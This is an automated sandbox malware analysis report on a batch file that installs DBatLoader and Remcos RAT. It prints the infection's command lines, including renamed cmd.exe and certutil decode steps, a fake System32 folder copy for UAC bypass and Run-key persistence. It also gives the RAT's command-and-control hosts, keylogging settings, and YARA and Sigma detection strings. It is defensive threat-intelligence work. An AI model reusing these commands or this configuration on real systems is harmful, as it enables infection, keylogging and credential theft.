Edit tour

Windows Analysis Report
URGENTE_NOTIFICATION.cmd

Overview

General Information

Sample name:	URGENTE_NOTIFICATION.cmd
Analysis ID:	1430814
MD5:	10dfd3dccfeaeb1e19e586e5d89ef1c6
SHA1:	af3aa6b4249a27778de9e8b2fc2ee6badb0e299a
SHA256:	f81c9ad169f7dcfa4545eab3552115156d7923957c1cffc4809a574209599e3c
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Remcos

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Installs a global keyboard hook

Machine Learning detection for dropped file

Registers a new ROOT certificate

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

Uses dynamic DNS services

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 6300 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe MD5: 41330D97BF17D07CD4308264F3032547)

alpha.exe (PID: 6528 cmdline: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

extrac32.exe (PID: 6108 cmdline: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)

alpha.exe (PID: 3152 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

kn.exe (PID: 2308 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)

alpha.exe (PID: 6772 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

kn.exe (PID: 6504 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)

sppsvc.pif (PID: 3664 cmdline: C:\Users\Public\Libraries\sppsvc.pif MD5: 38310FB63BAD19820D761C97F325896D)

cmd.exe (PID: 3736 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4460 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 2756 cmdline: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

cmd.exe (PID: 1196 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 344 cmdline: xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

cmd.exe (PID: 4548 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

xcopy.exe (PID: 1308 cmdline: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y MD5: 7E9B7CE496D09F70C072930940F9F02C)

extrac32.exe (PID: 6484 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Mywiztwu.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)

alpha.exe (PID: 7120 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

alpha.exe (PID: 6528 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Mywiztwu.PIF (PID: 6548 cmdline: "C:\Users\Public\Libraries\Mywiztwu.PIF" MD5: 38310FB63BAD19820D761C97F325896D)

Mywiztwu.PIF (PID: 3060 cmdline: "C:\Users\Public\Libraries\Mywiztwu.PIF" MD5: 38310FB63BAD19820D761C97F325896D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "37.duckdns.org:10521:1embargogo2378.duckdns.org:10522:0", "Assigned name": "Future2025", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RFUXJL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\MywiztwuO.bat	MALWARE_BAT_KoadicBAT	Koadic post-exploitation framework BAT payload	ditekSHen	0x2:$s1: &@cls&@set 0x5b:$s2: :~41,1%% 0x67:$s2: :~47,1%% 0x73:$s2: :~6,1%% 0x7e:$s2: :~53,1%% 0x8a:$s2: :~1,1% 0x9b:$s2: :~10,1%% 0xa7:$s2: :~39,1%% 0xb3:$s2: :~16,1%% 0xbf:$s2: :~13,1%% 0xcb:$s2: :~25,1%% 0xd7:$s2: :~53,1%% 0xe3:$s2: :~42,1%% 0xef:$s2: :~22,1%% 0xfb:$s2: :~18,1%% 0x107:$s2: :~48,1%% 0x113:$s2: :~51,1%% 0x11f:$s2: :~2,1%% 0x12a:$s2: :~61,1%% 0x136:$s2: :~9,1%% 0x141:$s2: :~19,1%%

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000003.1664121633.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14a8:$a1: Remcos restarted by watchdog! 0x1a20:$a3: %02i:%02i:%02i:%03i
00000009.00000002.4105700398.0000000002831000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4c0:$a1: Remcos restarted by watchdog! 0x6ca38:$a3: %02i:%02i:%02i:%03i
00000019.00000002.2032787763.00000000028B1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000018.00000002.1950636346.00000000023D5000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000018.00000002.1951955264.0000000002A51000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000019.00000002.2042016371.000000001447B000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14a8:$a1: Remcos restarted by watchdog! 0x1a20:$a3: %02i:%02i:%02i:%03i
00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
Process Memory Space: sppsvc.pif PID: 3664	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: sppsvc.pif PID: 3664	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x37e083:$a1: Remcos restarted by watchdog! 0x37e5dc:$a3: %02i:%02i:%02i:%03i 0x37ea13:$a3: %02i:%02i:%02i:%03i
Process Memory Space: Mywiztwu.PIF PID: 6548	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Mywiztwu.PIF PID: 6548	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Mywiztwu.PIF PID: 6548	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Mywiztwu.PIF PID: 6548	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x22ab1:$a1: Remcos restarted by watchdog! 0x75a9e:$a1: Remcos restarted by watchdog! 0x2300b:$a3: %02i:%02i:%02i:%03i 0x2343a:$a3: %02i:%02i:%02i:%03i 0x75ff7:$a3: %02i:%02i:%02i:%03i 0x76426:$a3: %02i:%02i:%02i:%03i
Process Memory Space: Mywiztwu.PIF PID: 3060	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: Mywiztwu.PIF PID: 3060	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x16e12:$a1: Remcos restarted by watchdog! 0x1736b:$a3: %02i:%02i:%02i:%03i 0x177a2:$a3: %02i:%02i:%02i:%03i
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.Mywiztwu.PIF.14550000.5.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.Mywiztwu.PIF.14550000.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.Mywiztwu.PIF.14550000.5.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
24.2.Mywiztwu.PIF.14550000.5.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
24.2.Mywiztwu.PIF.14550000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
24.2.Mywiztwu.PIF.14550000.5.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.Mywiztwu.PIF.14550000.5.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.Mywiztwu.PIF.14550000.5.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b8a8:$a1: Remcos restarted by watchdog! 0x6be20:$a3: %02i:%02i:%02i:%03i
24.2.Mywiztwu.PIF.14550000.5.unpack	REMCOS_RAT_variants	unknown	unknown	0x658fc:$str_a1: C:\Windows\System32\cmd.exe 0x65878:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65878:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65d78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x665a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6596c:$str_b2: Executing file: 0x669ec:$str_b3: GetDirectListeningPort 0x66398:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66518:$str_b7: \update.vbs 0x65994:$str_b9: Downloaded file: 0x65980:$str_b10: Downloading file: 0x65a24:$str_b12: Failed to upload file: 0x669b4:$str_b13: StartForward 0x669d4:$str_b14: StopForward 0x66470:$str_b15: fso.DeleteFile " 0x66404:$str_b16: On Error Resume Next 0x664a0:$str_b17: fso.DeleteFolder " 0x65a14:$str_b18: Uploaded file: 0x659d4:$str_b19: Unable to delete: 0x66438:$str_b20: while fso.FileExists(" 0x65eb1:$str_c0: [Firefox StoredLogins not found]
24.2.Mywiztwu.PIF.14550000.5.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x657e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6577c:$s1: CoGetObject 0x65790:$s1: CoGetObject 0x657ac:$s1: CoGetObject 0x6f738:$s1: CoGetObject 0x6573c:$s2: Elevation:Administrator!new:
24.2.Mywiztwu.PIF.2a50000.3.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 6528, ProcessName: alpha.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Mywiztwu.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 3664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mywiztwu

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 6528, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 6108, ProcessName: extrac32.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 74.112.186.144, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\sppsvc.pif, Initiated: true, ProcessId: 3664, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Mywiztwu.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 3664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mywiztwu

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\sppsvc.pif, CommandLine: C:\Users\Public\Libraries\sppsvc.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\sppsvc.pif, NewProcessName: C:\Users\Public\Libraries\sppsvc.pif, OriginalFileName: C:\Users\Public\Libraries\sppsvc.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 3664, ProcessName: sppsvc.pif

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y, CommandLine: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3736, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y, ProcessId: 2756, ProcessName: xcopy.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: F0 16 1B C3 B6 23 E1 19 D1 0B F4 52 77 26 C8 C3 26 4B 96 DE 11 81 37 C2 5C CF E0 3D A7 C6 D0 4A 83 3B 57 82 19 76 28 50 54 B5 DA 5D B1 17 47 0A 28 60 5B 18 F5 D5 52 C4 3E 05 BE 83 E4 CE 7A C4 53 5B 67 15 31 4B A0 77 9D B6 , EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 3664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-RFUXJL\exepath

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing

Found malware configuration

Source: 00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "37.duckdns.org:10521:1embargogo2378.duckdns.org:10522:0", "Assigned name": "Future2025", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RFUXJL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 28%
Source: C:\Users\Public\Libraries\netutils.dll	Virustotal: Detection: 47%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 3664, type: MEMORYSTR
